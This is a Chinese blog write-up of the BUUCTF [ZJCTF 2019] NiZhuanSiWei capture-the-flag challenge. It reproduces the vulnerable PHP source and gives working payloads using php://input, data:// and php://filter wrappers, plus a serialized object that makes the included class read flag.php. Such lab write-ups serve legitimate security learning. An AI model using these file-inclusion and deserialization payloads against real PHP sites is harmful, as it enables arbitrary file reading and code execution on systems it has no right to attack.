BUUCTF [ZJCTF 2019]NiZhuanSiWei

仲瑿

已于 2022-05-04 13:24:48 修改

阅读量551

点赞数 1

分类专栏： CTF 文章标签： php linux 开发语言

于 2022-05-02 12:30:10 首次发布

本文链接：https://blog.csdn.net/m0_49025459/article/details/124537335

版权

CTF 专栏收录该内容

95 篇文章 10 订阅

订阅专栏

进去就是源码

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

当然第一步肯定是读源码，看看有什么信息可以利用

看到有include文件包含
isset($text)函数用于检测变量是否已设置并且非NULL
file_get_contents() 读取的返回值为 welcome to the zjctf

那我们就可以构造payload，这里有两种方法都是使用了php伪协议

第一种方法

php://input

php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。

那我们直接就可以构造payload，bp抓包

/?text=php://input

拥有回显，那么我们现在要访问 //useless.php读取其中数据

php://filter

php://filter 是一种元封装器，设计用于数据流打开时的筛选过滤应用。这对于一体式（all-in-one）的文件函数非常有用，类似 readfile()、 file() 和 file_get_contents()，在数据流内容读取之前没有机会应用其他过滤器。简单通俗的说，这是一个中间件，在读入或写入数据的时候对数据进行处理后输出的一个过程。php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行。从而导致任意文件读取。

构造payload,这里要将请求改成POST请求

?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php

解密base64加密

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

第二种方法

data://

数据流封装器，以传递相应格式的数据。可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行。

示例用法：data://text/plain,http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

构造payload

?text=data:text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

分析 useless.php

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

我们将这个类序列化

<?php  

class Flag{  //flag.php  
    public $file='flag.php';  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
$a=new Flag();
echo serialize($a);
?>

这时候我们看之前的源码，开始构造payload

file_get_contents() 把整个文件读入一个字符串中。

该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持，还会使用内存映射技术来增强性能。

__toString() 是魔术方法的一种，具体用途是当一个对象被当作字符串对待的时候，会触发这个

?text=data:text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

查看网页源代码就看见了flag

仲瑿

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
BUUCTF [ZJCTF 2019]NiZhuanSiWei

进去就是源码 <?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>&l
复制链接

扫一扫